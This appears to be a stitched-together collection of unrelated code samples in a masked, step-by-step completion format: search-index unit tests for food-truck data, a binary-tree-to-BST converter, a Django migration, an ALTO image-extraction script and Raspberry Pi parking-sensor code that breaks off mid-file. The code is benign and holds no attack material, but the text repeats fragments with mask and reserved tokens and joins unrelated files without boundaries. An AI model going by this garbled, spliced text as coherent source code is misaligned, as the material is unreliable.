"step-1": "<mask token>\n\n\nclass TestClass:\n\n def setUp(self):\n search_index.buildIndex(test_data.sample_food_trucks_data)\n\n def tearDown(self):\n pass\n\n def test_case_query_index(self):\n assert_equals(search_index.query_index, test_data.sample_query_index)\n <mask token>\n\n def test_case_lng_index(self):\n assert_equals(search_index.sorted_longitudes, test_data.\n sample_longitude_index)\n\n def test_case_search_query(self):\n assert_equals(search_index.searchQuery('cold'), set([2, 3]))\n\n def test_case_search_query_case(self):\n assert_equals(search_index.searchQuery('Cold'), set([2, 3]))\n\n def test_case_search_find_le(self):\n assert_equals(search_index.find_le([10, 20, 30, 40], 20), 1)\n assert_equals(search_index.find_le([10, 20, 30, 40], 20.1), 1)\n assert_equals(search_index.find_le([10, 20, 30, 40], 30), 2)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def test_case_search3(self):\n all_objectids = [x['objectid'] for x in search_index.all_results[0:3]]\n results = search_index.search('', 37.787, -122.398658184604, \n 37.7901490737255, -122.394)\n assert_equals([x['objectid'] for x in results], all_objectids)\n\n def test_case_search4(self):\n all_objectids = [x['objectid'] for x in search_index.all_results[2:4]]\n results = search_index.search('cold', 37.7860914634251, -\n 122.398658184604, 37.7901490737255, -122.3934729318)\n assert_equals([x['objectid'] for x in results], all_objectids)\n\n def test_case_search5(self):\n all_objectids = [x['objectid'] for x in search_index.all_results[1:2]]\n results = search_index.search('cheese', 37.7860914634251, -\n 122.398658184604, 37.7901490737255, -122.3934729318)\n assert_equals([x['objectid'] for x in results], all_objectids)\n",
"step-2": "<mask token>\n\n\nclass TestClass:\n\n def setUp(self):\n search_index.buildIndex(test_data.sample_food_trucks_data)\n\n def tearDown(self):\n pass\n\n def test_case_query_index(self):\n assert_equals(search_index.query_index, test_data.sample_query_index)\n\n def test_case_lat_index(self):\n assert_equals(search_index.sorted_latitudes, test_data.\n sample_latitude_index)\n\n def test_case_lng_index(self):\n assert_equals(search_index.sorted_longitudes, test_data.\n sample_longitude_index)\n\n def test_case_search_query(self):\n assert_equals(search_index.searchQuery('cold'), set([2, 3]))\n\n def test_case_search_query_case(self):\n assert_equals(search_index.searchQuery('Cold'), set([2, 3]))\n\n def test_case_search_find_le(self):\n assert_equals(search_index.find_le([10, 20, 30, 40], 20), 1)\n assert_equals(search_index.find_le([10, 20, 30, 40], 20.1), 1)\n assert_equals(search_index.find_le([10, 20, 30, 40], 30), 2)\n <mask token>\n <mask token>\n\n def test_case_search1(self):\n all_objectids = [x['objectid'] for x in search_index.all_results]\n results = search_index.search('', 37.7860914634251, -\n 122.398658184604, 37.7901490737255, -122.3934729318)\n assert_equals([x['objectid'] for x in results], all_objectids)\n <mask token>\n\n def test_case_search3(self):\n all_objectids = [x['objectid'] for x in search_index.all_results[0:3]]\n results = search_index.search('', 37.787, -122.398658184604, \n 37.7901490737255, -122.394)\n assert_equals([x['objectid'] for x in results], all_objectids)\n\n def test_case_search4(self):\n all_objectids = [x['objectid'] for x in search_index.all_results[2:4]]\n results = search_index.search('cold', 37.7860914634251, -\n 122.398658184604, 37.7901490737255, -122.3934729318)\n assert_equals([x['objectid'] for x in results], all_objectids)\n\n def test_case_search5(self):\n all_objectids = [x['objectid'] for x in search_index.all_results[1:2]]\n results = search_index.search('cheese', 37.7860914634251, -\n 
122.398658184604, 37.7901490737255, -122.3934729318)\n assert_equals([x['objectid'] for x in results], all_objectids)\n",
"step-3": "<mask token>\n\n\nclass TestClass:\n\n def setUp(self):\n search_index.buildIndex(test_data.sample_food_trucks_data)\n\n def tearDown(self):\n pass\n\n def test_case_query_index(self):\n assert_equals(search_index.query_index, test_data.sample_query_index)\n\n def test_case_lat_index(self):\n assert_equals(search_index.sorted_latitudes, test_data.\n sample_latitude_index)\n\n def test_case_lng_index(self):\n assert_equals(search_index.sorted_longitudes, test_data.\n sample_longitude_index)\n\n def test_case_search_query(self):\n assert_equals(search_index.searchQuery('cold'), set([2, 3]))\n\n def test_case_search_query_case(self):\n assert_equals(search_index.searchQuery('Cold'), set([2, 3]))\n\n def test_case_search_find_le(self):\n assert_equals(search_index.find_le([10, 20, 30, 40], 20), 1)\n assert_equals(search_index.find_le([10, 20, 30, 40], 20.1), 1)\n assert_equals(search_index.find_le([10, 20, 30, 40], 30), 2)\n\n def test_case_search_find_ge(self):\n assert_equals(search_index.find_ge([10, 20, 30, 40], 20), 1)\n assert_equals(search_index.find_ge([10, 20, 30, 40], 30), 2)\n assert_equals(search_index.find_ge([10, 20, 30, 40], 20.1), 2)\n <mask token>\n\n def test_case_search1(self):\n all_objectids = [x['objectid'] for x in search_index.all_results]\n results = search_index.search('', 37.7860914634251, -\n 122.398658184604, 37.7901490737255, -122.3934729318)\n assert_equals([x['objectid'] for x in results], all_objectids)\n <mask token>\n\n def test_case_search3(self):\n all_objectids = [x['objectid'] for x in search_index.all_results[0:3]]\n results = search_index.search('', 37.787, -122.398658184604, \n 37.7901490737255, -122.394)\n assert_equals([x['objectid'] for x in results], all_objectids)\n\n def test_case_search4(self):\n all_objectids = [x['objectid'] for x in search_index.all_results[2:4]]\n results = search_index.search('cold', 37.7860914634251, -\n 122.398658184604, 37.7901490737255, -122.3934729318)\n assert_equals([x['objectid'] 
for x in results], all_objectids)\n\n def test_case_search5(self):\n all_objectids = [x['objectid'] for x in search_index.all_results[1:2]]\n results = search_index.search('cheese', 37.7860914634251, -\n 122.398658184604, 37.7901490737255, -122.3934729318)\n assert_equals([x['objectid'] for x in results], all_objectids)\n",
"step-4": "<mask token>\n__author__ = 'abhay'\nfrom nose.tools import *\nimport test_data\nimport search_index\n\n\nclass TestClass:\n\n def setUp(self):\n search_index.buildIndex(test_data.sample_food_trucks_data)\n\n def tearDown(self):\n pass\n\n def test_case_query_index(self):\n assert_equals(search_index.query_index, test_data.sample_query_index)\n\n def test_case_lat_index(self):\n assert_equals(search_index.sorted_latitudes, test_data.\n sample_latitude_index)\n\n def test_case_lng_index(self):\n assert_equals(search_index.sorted_longitudes, test_data.\n sample_longitude_index)\n\n def test_case_search_query(self):\n assert_equals(search_index.searchQuery('cold'), set([2, 3]))\n\n def test_case_search_query_case(self):\n assert_equals(search_index.searchQuery('Cold'), set([2, 3]))\n\n def test_case_search_find_le(self):\n assert_equals(search_index.find_le([10, 20, 30, 40], 20), 1)\n assert_equals(search_index.find_le([10, 20, 30, 40], 20.1), 1)\n assert_equals(search_index.find_le([10, 20, 30, 40], 30), 2)\n\n def test_case_search_find_ge(self):\n assert_equals(search_index.find_ge([10, 20, 30, 40], 20), 1)\n assert_equals(search_index.find_ge([10, 20, 30, 40], 30), 2)\n assert_equals(search_index.find_ge([10, 20, 30, 40], 20.1), 2)\n\n def test_case_search_lat(self):\n assert_equals(search_index.find_array_range_matching([10, 20, 30, \n 40], 20, 30), set([1, 2]))\n assert_equals(search_index.find_array_range_matching([10, 20, 30, \n 40], 19, 35), set([1, 2]))\n assert_equals(search_index.find_array_range_matching([10, 20, 30, \n 40], 9, 50), set([0, 1, 2, 3]))\n\n def test_case_search1(self):\n all_objectids = [x['objectid'] for x in search_index.all_results]\n results = search_index.search('', 37.7860914634251, -\n 122.398658184604, 37.7901490737255, -122.3934729318)\n assert_equals([x['objectid'] for x in results], all_objectids)\n\n def test_case_search2(self):\n all_objectids = [x['objectid'] for x in search_index.all_results[0:3]]\n results = 
search_index.search('', 37.7879000978181, -\n 122.398658184604, 37.7901490737255, -122.394594036205)\n assert_equals([x['objectid'] for x in results], all_objectids)\n\n def test_case_search3(self):\n all_objectids = [x['objectid'] for x in search_index.all_results[0:3]]\n results = search_index.search('', 37.787, -122.398658184604, \n 37.7901490737255, -122.394)\n assert_equals([x['objectid'] for x in results], all_objectids)\n\n def test_case_search4(self):\n all_objectids = [x['objectid'] for x in search_index.all_results[2:4]]\n results = search_index.search('cold', 37.7860914634251, -\n 122.398658184604, 37.7901490737255, -122.3934729318)\n assert_equals([x['objectid'] for x in results], all_objectids)\n\n def test_case_search5(self):\n all_objectids = [x['objectid'] for x in search_index.all_results[1:2]]\n results = search_index.search('cheese', 37.7860914634251, -\n 122.398658184604, 37.7901490737255, -122.3934729318)\n assert_equals([x['objectid'] for x in results], all_objectids)\n",
"step-5": "# Copyright (C) 2014 Abhay Vardhan. All Rights Reserved.\n\"\"\"\nAuthor: abhay.vardhan@gmail.com\n\nWe have not yet added tests which exercise the HTTP GET directly.\n\"\"\"\n__author__ = 'abhay'\n\nfrom nose.tools import *\n\nimport test_data\nimport search_index\n\nclass TestClass:\n def setUp(self):\n search_index.buildIndex(test_data.sample_food_trucks_data)\n\n def tearDown(self):\n pass\n\n def test_case_query_index(self):\n assert_equals(search_index.query_index, test_data.sample_query_index)\n\n def test_case_lat_index(self):\n assert_equals(search_index.sorted_latitudes, test_data.sample_latitude_index)\n\n def test_case_lng_index(self):\n assert_equals(search_index.sorted_longitudes, test_data.sample_longitude_index)\n\n def test_case_search_query(self):\n assert_equals(search_index.searchQuery('cold'), set([2, 3]))\n\n def test_case_search_query_case(self):\n assert_equals(search_index.searchQuery('Cold'), set([2, 3]))\n\n def test_case_search_find_le(self):\n assert_equals(search_index.find_le([10, 20, 30, 40], 20), 1)\n assert_equals(search_index.find_le([10, 20, 30, 40], 20.1), 1)\n assert_equals(search_index.find_le([10, 20, 30, 40], 30), 2)\n\n def test_case_search_find_ge(self):\n assert_equals(search_index.find_ge([10, 20, 30, 40], 20), 1)\n assert_equals(search_index.find_ge([10, 20, 30, 40], 30), 2)\n assert_equals(search_index.find_ge([10, 20, 30, 40], 20.1), 2)\n\n def test_case_search_lat(self):\n assert_equals(search_index.find_array_range_matching([10, 20, 30, 40], 20, 30), set([1, 2]))\n assert_equals(search_index.find_array_range_matching([10, 20, 30, 40], 19, 35), set([1, 2]))\n assert_equals(search_index.find_array_range_matching([10, 20, 30, 40], 9, 50), set([0, 1, 2, 3]))\n\n def test_case_search1(self):\n all_objectids = [x['objectid'] for x in search_index.all_results]\n results = search_index.search('', 37.7860914634251, -122.398658184604, 37.7901490737255, -122.3934729318)\n assert_equals([x['objectid'] for x in 
results],\n all_objectids)\n\n def test_case_search2(self):\n all_objectids = [x['objectid'] for x in search_index.all_results[0:3]]\n results = search_index.search('', 37.7879000978181, -122.398658184604, 37.7901490737255, -122.394594036205)\n assert_equals([x['objectid'] for x in results],\n all_objectids)\n\n def test_case_search3(self):\n all_objectids = [x['objectid'] for x in search_index.all_results[0:3]]\n results = search_index.search('', 37.787, -122.398658184604, 37.7901490737255, -122.394)\n assert_equals([x['objectid'] for x in results],\n all_objectids)\n\n def test_case_search4(self):\n all_objectids = [x['objectid'] for x in search_index.all_results[2:4]]\n results = search_index.search('cold', 37.7860914634251, -122.398658184604, 37.7901490737255, -122.3934729318)\n assert_equals([x['objectid'] for x in results],\n all_objectids)\n\n def test_case_search5(self):\n all_objectids = [x['objectid'] for x in search_index.all_results[1:2]]\n results = search_index.search('cheese', 37.7860914634251, -122.398658184604, 37.7901490737255, -122.3934729318)\n assert_equals([x['objectid'] for x in results],\n all_objectids)\n\n\n",
"step-ids": [
11,
13,
14,
18,
19
]
}
|
[
11,
13,
14,
18,
19
] |
from DataStructures.BST.util import *
def storeInorder(root, inorder):
if root is None:
return
storeInorder(root.left, inorder)
inorder.append(root.data)
storeInorder(root.right, inorder)
def arrayToBST(arr, root):
# Base Case
if root is None:
return
# First update the left subtree
arrayToBST(arr, root.left)
# now update root's data delete the value from array
root.data = arr[0]
arr.pop(0)
# Finally update the right subtree
arrayToBST(arr, root.right)
def binaryTreeToBST(root):
if root is None:
return
# Create the temp array and store the inorder traveral of tree
arr = []
storeInorder(root, arr)
# Sort the array
arr.sort()
# copy array elements back to binary tree
arrayToBST(arr, root)
if __name__ == '__main__':
    # Build a deliberately non-BST binary tree, convert it in place, and
    # print the (now sorted) inorder traversal.
    tree = Node(10)
    tree.left = Node(30)
    tree.left.left = Node(20)
    tree.right = Node(15)
    tree.right.right = Node(5)
    binaryTreeToBST(tree)
    inorder(tree)
|
normal
|
{
"blob_id": "d2af2b25a1ba2db93c977a13fe0273919bc2e6e0",
"index": 7768,
"step-1": "<mask token>\n\n\ndef storeInorder(root, inorder):\n if root is None:\n return\n storeInorder(root.left, inorder)\n inorder.append(root.data)\n storeInorder(root.right, inorder)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef storeInorder(root, inorder):\n if root is None:\n return\n storeInorder(root.left, inorder)\n inorder.append(root.data)\n storeInorder(root.right, inorder)\n\n\ndef arrayToBST(arr, root):\n if root is None:\n return\n arrayToBST(arr, root.left)\n root.data = arr[0]\n arr.pop(0)\n arrayToBST(arr, root.right)\n\n\ndef binaryTreeToBST(root):\n if root is None:\n return\n arr = []\n storeInorder(root, arr)\n arr.sort()\n arrayToBST(arr, root)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef storeInorder(root, inorder):\n if root is None:\n return\n storeInorder(root.left, inorder)\n inorder.append(root.data)\n storeInorder(root.right, inorder)\n\n\ndef arrayToBST(arr, root):\n if root is None:\n return\n arrayToBST(arr, root.left)\n root.data = arr[0]\n arr.pop(0)\n arrayToBST(arr, root.right)\n\n\ndef binaryTreeToBST(root):\n if root is None:\n return\n arr = []\n storeInorder(root, arr)\n arr.sort()\n arrayToBST(arr, root)\n\n\nif __name__ == '__main__':\n root = Node(10)\n root.left = Node(30)\n root.right = Node(15)\n root.left.left = Node(20)\n root.right.right = Node(5)\n binaryTreeToBST(root)\n inorder(root)\n",
"step-4": "from DataStructures.BST.util import *\n\n\ndef storeInorder(root, inorder):\n if root is None:\n return\n storeInorder(root.left, inorder)\n inorder.append(root.data)\n storeInorder(root.right, inorder)\n\n\ndef arrayToBST(arr, root):\n if root is None:\n return\n arrayToBST(arr, root.left)\n root.data = arr[0]\n arr.pop(0)\n arrayToBST(arr, root.right)\n\n\ndef binaryTreeToBST(root):\n if root is None:\n return\n arr = []\n storeInorder(root, arr)\n arr.sort()\n arrayToBST(arr, root)\n\n\nif __name__ == '__main__':\n root = Node(10)\n root.left = Node(30)\n root.right = Node(15)\n root.left.left = Node(20)\n root.right.right = Node(5)\n binaryTreeToBST(root)\n inorder(root)\n",
"step-5": "from DataStructures.BST.util import *\n\n\ndef storeInorder(root, inorder):\n if root is None:\n return\n\n storeInorder(root.left, inorder)\n inorder.append(root.data)\n storeInorder(root.right, inorder)\n\n\ndef arrayToBST(arr, root):\n # Base Case\n if root is None:\n return\n\n # First update the left subtree\n arrayToBST(arr, root.left)\n\n # now update root's data delete the value from array\n root.data = arr[0]\n arr.pop(0)\n\n # Finally update the right subtree\n arrayToBST(arr, root.right)\n\n\ndef binaryTreeToBST(root):\n if root is None:\n return\n\n # Create the temp array and store the inorder traveral of tree\n arr = []\n storeInorder(root, arr)\n # Sort the array\n arr.sort()\n # copy array elements back to binary tree\n arrayToBST(arr, root)\n\n\nif __name__ == '__main__':\n root = Node(10)\n root.left = Node(30)\n root.right = Node(15)\n root.left.left = Node(20)\n root.right.right = Node(5)\n\n binaryTreeToBST(root)\n\n inorder(root)\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [migrations.swappable_dependency(settings.
AUTH_USER_MODEL), ('organization', '0010_auto_20210801_1623'), (
'quote', '0004_auto_20210805_1032')]
operations = [migrations.CreateModel(name='FollowUp', fields=[('id',
models.BigAutoField(auto_created=True, primary_key=True, serialize=
False, verbose_name='ID')), ('timestamp', models.DateTimeField(
auto_now_add=True, verbose_name='تاریخ ثبت')), ('text', models.
TextField(default=None, verbose_name='متن پیگیری')), ('creator',
models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=
settings.AUTH_USER_MODEL, verbose_name='کاربر ثبت کننده')), (
'organization', models.ForeignKey(on_delete=django.db.models.
deletion.CASCADE, to='organization.organization', verbose_name=
'سازمان'))])]
<|reserved_special_token_1|>
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [migrations.swappable_dependency(settings.
AUTH_USER_MODEL), ('organization', '0010_auto_20210801_1623'), (
'quote', '0004_auto_20210805_1032')]
operations = [migrations.CreateModel(name='FollowUp', fields=[('id',
models.BigAutoField(auto_created=True, primary_key=True, serialize=
False, verbose_name='ID')), ('timestamp', models.DateTimeField(
auto_now_add=True, verbose_name='تاریخ ثبت')), ('text', models.
TextField(default=None, verbose_name='متن پیگیری')), ('creator',
models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=
settings.AUTH_USER_MODEL, verbose_name='کاربر ثبت کننده')), (
'organization', models.ForeignKey(on_delete=django.db.models.
deletion.CASCADE, to='organization.organization', verbose_name=
'سازمان'))])]
<|reserved_special_token_1|>
# Generated by Django 3.2.5 on 2021-08-05 07:19
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated migration: creates the FollowUp model, which records a
    # free-text follow-up note against an organization together with the
    # user who wrote it and a creation timestamp.

    dependencies = [
        # FollowUp.creator points at the (swappable) user model.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('organization', '0010_auto_20210801_1623'),
        ('quote', '0004_auto_20210805_1032'),
    ]

    operations = [
        migrations.CreateModel(
            name='FollowUp',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # Set once on insert, never updated (auto_now_add).
                ('timestamp', models.DateTimeField(auto_now_add=True, verbose_name='تاریخ ثبت')),
                ('text', models.TextField(default=None, verbose_name='متن پیگیری')),
                # Deleting the user or the organization cascades to its follow-ups.
                ('creator', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='کاربر ثبت کننده')),
                ('organization', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='organization.organization', verbose_name='سازمان')),
            ],
        ),
    ]
|
flexible
|
{
"blob_id": "f2c53efa4b7c2df592582e3093ff269b703be1e0",
"index": 3054,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [migrations.swappable_dependency(settings.\n AUTH_USER_MODEL), ('organization', '0010_auto_20210801_1623'), (\n 'quote', '0004_auto_20210805_1032')]\n operations = [migrations.CreateModel(name='FollowUp', fields=[('id',\n models.BigAutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('timestamp', models.DateTimeField(\n auto_now_add=True, verbose_name='تاریخ ثبت')), ('text', models.\n TextField(default=None, verbose_name='متن پیگیری')), ('creator',\n models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=\n settings.AUTH_USER_MODEL, verbose_name='کاربر ثبت کننده')), (\n 'organization', models.ForeignKey(on_delete=django.db.models.\n deletion.CASCADE, to='organization.organization', verbose_name=\n 'سازمان'))])]\n",
"step-4": "from django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n dependencies = [migrations.swappable_dependency(settings.\n AUTH_USER_MODEL), ('organization', '0010_auto_20210801_1623'), (\n 'quote', '0004_auto_20210805_1032')]\n operations = [migrations.CreateModel(name='FollowUp', fields=[('id',\n models.BigAutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('timestamp', models.DateTimeField(\n auto_now_add=True, verbose_name='تاریخ ثبت')), ('text', models.\n TextField(default=None, verbose_name='متن پیگیری')), ('creator',\n models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=\n settings.AUTH_USER_MODEL, verbose_name='کاربر ثبت کننده')), (\n 'organization', models.ForeignKey(on_delete=django.db.models.\n deletion.CASCADE, to='organization.organization', verbose_name=\n 'سازمان'))])]\n",
"step-5": "# Generated by Django 3.2.5 on 2021-08-05 07:19\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('organization', '0010_auto_20210801_1623'),\n ('quote', '0004_auto_20210805_1032'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='FollowUp',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('timestamp', models.DateTimeField(auto_now_add=True, verbose_name='تاریخ ثبت')),\n ('text', models.TextField(default=None, verbose_name='متن پیگیری')),\n ('creator', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='کاربر ثبت کننده')),\n ('organization', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='organization.organization', verbose_name='سازمان')),\n ],\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# String concatenation demo: join two fragments into "python".
str1 = "py"
str2 = "thon"
print(f"{str1}{str2}")
|
normal
|
{
"blob_id": "d95cbca8e892f18f099b370e139176770ce0c1b7",
"index": 8270,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(str1 + str2)\n",
"step-3": "str1 = 'py'\nstr2 = 'thon'\nprint(str1 + str2)\n",
"step-4": "# 文字列(結合)\n\nstr1 = \"py\"\nstr2 = \"thon\"\nprint(str1+str2)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for xml_path in glob.glob('./input/**/*.xml', recursive=True):
current, image = read_alto_for_training(xml_path)
images[image] = current
for key in current:
data[key].extend(current[key])
<|reserved_special_token_0|>
for cls in data:
total = sum([len(val) for val in data.values()])
print(
f"{cls.zfill(10).replace('0', ' ')} : {len(data[cls]) / total:.2f} of the whole ({len(data[cls])})"
)
minimum = min([len(data[cls]), minimum])
extract_images_from_bbox_dict_for_training(images, output_dir='./data/')
split_dataset('./data/*', max_size=minimum, except_for_train=True)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
data = defaultdict(list)
images = {}
for xml_path in glob.glob('./input/**/*.xml', recursive=True):
current, image = read_alto_for_training(xml_path)
images[image] = current
for key in current:
data[key].extend(current[key])
minimum = float('inf')
for cls in data:
total = sum([len(val) for val in data.values()])
print(
f"{cls.zfill(10).replace('0', ' ')} : {len(data[cls]) / total:.2f} of the whole ({len(data[cls])})"
)
minimum = min([len(data[cls]), minimum])
extract_images_from_bbox_dict_for_training(images, output_dir='./data/')
split_dataset('./data/*', max_size=minimum, except_for_train=True)
<|reserved_special_token_1|>
import glob
from collections import defaultdict
from stylalto.datasets.extractor import read_alto_for_training, extract_images_from_bbox_dict_for_training, split_dataset
data = defaultdict(list)
images = {}
for xml_path in glob.glob('./input/**/*.xml', recursive=True):
current, image = read_alto_for_training(xml_path)
images[image] = current
for key in current:
data[key].extend(current[key])
minimum = float('inf')
for cls in data:
total = sum([len(val) for val in data.values()])
print(
f"{cls.zfill(10).replace('0', ' ')} : {len(data[cls]) / total:.2f} of the whole ({len(data[cls])})"
)
minimum = min([len(data[cls]), minimum])
extract_images_from_bbox_dict_for_training(images, output_dir='./data/')
split_dataset('./data/*', max_size=minimum, except_for_train=True)
<|reserved_special_token_1|>
import glob
from collections import defaultdict
from stylalto.datasets.extractor import read_alto_for_training, extract_images_from_bbox_dict_for_training, split_dataset
data = defaultdict(list)
images = {}
for xml_path in glob.glob("./input/**/*.xml", recursive=True):
current, image = read_alto_for_training(xml_path)
images[image] = current
for key in current:
data[key].extend(current[key])
minimum = float("inf")
for cls in data:
total = sum([len(val) for val in data.values()])
print(f"{cls.zfill(10).replace('0', ' ')} : {len(data[cls]) / total:.2f} of the whole ({len(data[cls])})")
minimum = min([len(data[cls]), minimum])
# Extract images
extract_images_from_bbox_dict_for_training(images, output_dir="./data/")
# Split into dataset
split_dataset("./data/*", max_size=minimum, except_for_train=True)
|
flexible
|
{
"blob_id": "41e642c4acb212470577ef43908a1dcf2e0f5730",
"index": 7159,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor xml_path in glob.glob('./input/**/*.xml', recursive=True):\n current, image = read_alto_for_training(xml_path)\n images[image] = current\n for key in current:\n data[key].extend(current[key])\n<mask token>\nfor cls in data:\n total = sum([len(val) for val in data.values()])\n print(\n f\"{cls.zfill(10).replace('0', ' ')} : {len(data[cls]) / total:.2f} of the whole ({len(data[cls])})\"\n )\n minimum = min([len(data[cls]), minimum])\nextract_images_from_bbox_dict_for_training(images, output_dir='./data/')\nsplit_dataset('./data/*', max_size=minimum, except_for_train=True)\n",
"step-3": "<mask token>\ndata = defaultdict(list)\nimages = {}\nfor xml_path in glob.glob('./input/**/*.xml', recursive=True):\n current, image = read_alto_for_training(xml_path)\n images[image] = current\n for key in current:\n data[key].extend(current[key])\nminimum = float('inf')\nfor cls in data:\n total = sum([len(val) for val in data.values()])\n print(\n f\"{cls.zfill(10).replace('0', ' ')} : {len(data[cls]) / total:.2f} of the whole ({len(data[cls])})\"\n )\n minimum = min([len(data[cls]), minimum])\nextract_images_from_bbox_dict_for_training(images, output_dir='./data/')\nsplit_dataset('./data/*', max_size=minimum, except_for_train=True)\n",
"step-4": "import glob\nfrom collections import defaultdict\nfrom stylalto.datasets.extractor import read_alto_for_training, extract_images_from_bbox_dict_for_training, split_dataset\ndata = defaultdict(list)\nimages = {}\nfor xml_path in glob.glob('./input/**/*.xml', recursive=True):\n current, image = read_alto_for_training(xml_path)\n images[image] = current\n for key in current:\n data[key].extend(current[key])\nminimum = float('inf')\nfor cls in data:\n total = sum([len(val) for val in data.values()])\n print(\n f\"{cls.zfill(10).replace('0', ' ')} : {len(data[cls]) / total:.2f} of the whole ({len(data[cls])})\"\n )\n minimum = min([len(data[cls]), minimum])\nextract_images_from_bbox_dict_for_training(images, output_dir='./data/')\nsplit_dataset('./data/*', max_size=minimum, except_for_train=True)\n",
"step-5": "import glob\nfrom collections import defaultdict\nfrom stylalto.datasets.extractor import read_alto_for_training, extract_images_from_bbox_dict_for_training, split_dataset\n\n\ndata = defaultdict(list)\nimages = {}\nfor xml_path in glob.glob(\"./input/**/*.xml\", recursive=True):\n current, image = read_alto_for_training(xml_path)\n images[image] = current\n for key in current:\n data[key].extend(current[key])\n\nminimum = float(\"inf\")\nfor cls in data:\n total = sum([len(val) for val in data.values()])\n print(f\"{cls.zfill(10).replace('0', ' ')} : {len(data[cls]) / total:.2f} of the whole ({len(data[cls])})\")\n minimum = min([len(data[cls]), minimum])\n\n# Extract images\nextract_images_from_bbox_dict_for_training(images, output_dir=\"./data/\")\n\n# Split into dataset\nsplit_dataset(\"./data/*\", max_size=minimum, except_for_train=True)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(s1, GPIO.IN)
GPIO.setup(s2, GPIO.IN)
<|reserved_special_token_0|>
while 1:
if GPIO.input(s1) == False:
data1 = 1
counter += 1
else:
data1 = 0
print('Received from 1: %s' % data1)
if GPIO.input(s2) == False:
data2 = 1
counter -= 1
else:
data2 = 0
print('Received from 2: %s' % data2)
if counter > 8:
counter = 8
elif counter < 0:
counter = 0
print('Counter= %s' % counter)
doc_ref_s1.update({u'priority': counter})
<|reserved_special_token_1|>
<|reserved_special_token_0|>
path = '/home/pi/Desktop/Parking.json'
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = path
s1 = 2
s2 = 21
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(s1, GPIO.IN)
GPIO.setup(s2, GPIO.IN)
db = firestore.Client()
doc_ref_s1 = db.collection(u'sensors').document(u'sensor1')
doc_ref_s2 = db.collection(u'sensors').document(u'sensor2')
data1 = 0
data2 = 0
counter = 0
while 1:
if GPIO.input(s1) == False:
data1 = 1
counter += 1
else:
data1 = 0
print('Received from 1: %s' % data1)
if GPIO.input(s2) == False:
data2 = 1
counter -= 1
else:
data2 = 0
print('Received from 2: %s' % data2)
if counter > 8:
counter = 8
elif counter < 0:
counter = 0
print('Counter= %s' % counter)
doc_ref_s1.update({u'priority': counter})
<|reserved_special_token_1|>
import os
import RPi.GPIO as GPIO
from google.cloud import firestore
import time
path = '/home/pi/Desktop/Parking.json'
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = path
s1 = 2
s2 = 21
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(s1, GPIO.IN)
GPIO.setup(s2, GPIO.IN)
db = firestore.Client()
doc_ref_s1 = db.collection(u'sensors').document(u'sensor1')
doc_ref_s2 = db.collection(u'sensors').document(u'sensor2')
data1 = 0
data2 = 0
counter = 0
while 1:
if GPIO.input(s1) == False:
data1 = 1
counter += 1
else:
data1 = 0
print('Received from 1: %s' % data1)
if GPIO.input(s2) == False:
data2 = 1
counter -= 1
else:
data2 = 0
print('Received from 2: %s' % data2)
if counter > 8:
counter = 8
elif counter < 0:
counter = 0
print('Counter= %s' % counter)
doc_ref_s1.update({u'priority': counter})
<|reserved_special_token_1|>
import os
import RPi.GPIO as GPIO
from google.cloud import firestore
import time
############Explicit Credential environment
path="/home/pi/Desktop/Parking.json"
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] =path
#GPIO starts
s1=2
s2=21
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(s1,GPIO.IN)
